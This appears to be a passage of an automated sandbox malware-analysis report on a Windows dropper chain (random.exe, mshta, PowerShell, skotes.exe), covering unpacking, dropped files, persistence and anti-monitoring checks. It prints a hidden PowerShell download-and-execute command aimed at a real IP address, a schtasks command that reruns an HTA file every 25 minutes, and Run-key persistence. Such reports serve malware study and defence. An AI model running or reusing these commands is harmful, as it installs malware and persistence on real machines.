                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEUnpacked PE file: 12.2.Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.b80000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 13.2.skotes.exe.300000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 14.2.skotes.exe.300000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 18.2.skotes.exe.300000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeUnpacked PE file: 20.2.28f48f066a.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ywmyudtw:EW;cgaerijz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ywmyudtw:EW;cgaerijz:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeUnpacked PE file: 21.2.8c36d696e4.exe.b10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;efrqcofg:EW;yqrfybbc:EW;.taggant:EW; vs :ER;.rsrc:W;
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeUnpacked PE file: 23.2.0dd40f41c4.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hyfxsejb:EW;dmolwlsw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hyfxsejb:EW;dmolwlsw:EW;.taggant:EW;
                            Suspicious powershell command line found
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: random[1].exe2.18.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003142DE
                            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: real checksum: 0x2e848b should be: 0x2e6730
                            Source: 0dd40f41c4.exe.18.drStatic PE information: real checksum: 0x1c708b should be: 0x1cdf47
                            Source: skotes.exe.11.drStatic PE information: real checksum: 0x2e848b should be: 0x2e6730
                            Source: 28f48f066a.exe.18.drStatic PE information: real checksum: 0x1cbd75 should be: 0x1cb1e4
                            Source: random[1].exe0.18.drStatic PE information: real checksum: 0x1c708b should be: 0x1cdf47
                            Source: random[1].exe1.18.drStatic PE information: real checksum: 0x1c7c7f should be: 0x19ef7a
                            Source: 8c36d696e4.exe.18.drStatic PE information: real checksum: 0x1bb953 should be: 0x1c86bc
                            Source: random[1].exe.18.drStatic PE information: real checksum: 0x1cbd75 should be: 0x1cb1e4
                            Source: random[1].exe2.18.drStatic PE information: real checksum: 0x1bb953 should be: 0x1c86bc
                            Source: 1e1a1f5243.exe.18.drStatic PE information: real checksum: 0x1c7c7f should be: 0x19ef7a
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name:
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name: .idata
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name: mqertzmi
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name: jvsnxutt
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name: .taggant
                            Source: skotes.exe.11.drStatic PE information: section name:
                            Source: skotes.exe.11.drStatic PE information: section name: .idata
                            Source: skotes.exe.11.drStatic PE information: section name: mqertzmi
                            Source: skotes.exe.11.drStatic PE information: section name: jvsnxutt
                            Source: skotes.exe.11.drStatic PE information: section name: .taggant
                            Source: random[1].exe.18.drStatic PE information: section name:
                            Source: random[1].exe.18.drStatic PE information: section name: .idata
                            Source: random[1].exe.18.drStatic PE information: section name:
                            Source: random[1].exe.18.drStatic PE information: section name: ywmyudtw
                            Source: random[1].exe.18.drStatic PE information: section name: cgaerijz
                            Source: random[1].exe.18.drStatic PE information: section name: .taggant
                            Source: 28f48f066a.exe.18.drStatic PE information: section name:
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: .idata
                            Source: 28f48f066a.exe.18.drStatic PE information: section name:
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: ywmyudtw
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: cgaerijz
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: .taggant
                            Source: random[1].exe0.18.drStatic PE information: section name:
                            Source: random[1].exe0.18.drStatic PE information: section name: .idata
                            Source: random[1].exe0.18.drStatic PE information: section name:
                            Source: random[1].exe0.18.drStatic PE information: section name: hyfxsejb
                            Source: random[1].exe0.18.drStatic PE information: section name: dmolwlsw
                            Source: random[1].exe0.18.drStatic PE information: section name: .taggant
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name:
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: .idata
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name:
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: hyfxsejb
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: dmolwlsw
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: .taggant
                            Source: random[1].exe1.18.drStatic PE information: section name:
                            Source: random[1].exe1.18.drStatic PE information: section name: .idata
                            Source: random[1].exe1.18.drStatic PE information: section name:
                            Source: random[1].exe1.18.drStatic PE information: section name: crzarjak
                            Source: random[1].exe1.18.drStatic PE information: section name: flqcehaa
                            Source: random[1].exe1.18.drStatic PE information: section name: .taggant
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name:
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name: .idata
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name:
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name: crzarjak
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name: flqcehaa
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name: .taggant
                            Source: random[1].exe2.18.drStatic PE information: section name:
                            Source: random[1].exe2.18.drStatic PE information: section name: .idata
                            Source: random[1].exe2.18.drStatic PE information: section name:
                            Source: random[1].exe2.18.drStatic PE information: section name: efrqcofg
                            Source: random[1].exe2.18.drStatic PE information: section name: yqrfybbc
                            Source: random[1].exe2.18.drStatic PE information: section name: .taggant
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name:
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: .idata
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name:
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: efrqcofg
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: yqrfybbc
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: .taggant
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_00330A76 push ecx; ret 0_2_00330A89
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034C3183 pushad ; ret 6_2_034C3191
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD343400BD pushad ; iretd 9_2_00007FFD343400C1
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00B9D91C push ecx; ret 11_2_00B9D92F
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 11_2_00B91359 push es; ret 11_2_00B9135A
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00B9D91C push ecx; ret 12_2_00B9D92F
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXECode function: 12_2_00B8BF38 push esi; iretd 12_2_00B8BF39
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 13_2_0031D91C push ecx; ret 13_2_0031D92F
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 14_2_0031D91C push ecx; ret 14_2_0031D92F
                            Source: Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.6.drStatic PE information: section name: entropy: 7.986747055430897
                            Source: skotes.exe.11.drStatic PE information: section name: entropy: 7.986747055430897
                            Source: random[1].exe.18.drStatic PE information: section name: entropy: 7.975828142412343
                            Source: random[1].exe.18.drStatic PE information: section name: ywmyudtw entropy: 7.953790369896108
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: entropy: 7.975828142412343
                            Source: 28f48f066a.exe.18.drStatic PE information: section name: ywmyudtw entropy: 7.953790369896108
                            Source: random[1].exe0.18.drStatic PE information: section name: entropy: 7.977658968302794
                            Source: random[1].exe0.18.drStatic PE information: section name: hyfxsejb entropy: 7.9524527755541605
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: entropy: 7.977658968302794
                            Source: 0dd40f41c4.exe.18.drStatic PE information: section name: hyfxsejb entropy: 7.9524527755541605
                            Source: random[1].exe1.18.drStatic PE information: section name: crzarjak entropy: 7.953854053776922
                            Source: 1e1a1f5243.exe.18.drStatic PE information: section name: crzarjak entropy: 7.953854053776922
                            Source: random[1].exe2.18.drStatic PE information: section name: entropy: 7.966652808119376
                            Source: random[1].exe2.18.drStatic PE information: section name: efrqcofg entropy: 7.9532683612246755
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: entropy: 7.966652808119376
                            Source: 8c36d696e4.exe.18.drStatic PE information: section name: efrqcofg entropy: 7.9532683612246755

                            Persistence and Installation Behavior

                            barindex
                            Tries to download and execute files (via powershell)
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062372001\1e1a1f5243.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2E19.tmpJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeJump to dropped file

                            Boot Survival

                            barindex
                            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: Filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: Filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: Filemonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeWindow searched: window name: Regmonclass
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeWindow searched: window name: RegmonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeWindow searched: window name: FilemonClass
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PzPPLma0H6r /tr "mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta" /sc minute /mo 25 /ru "user" /f
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0dd40f41c4.exe
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0dd40f41c4.exe

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57335 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57335 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57335
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57343 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57343
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57348 -> 33791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33791 -> 57348
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0032F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0032F98E
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003A1C41
                            Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
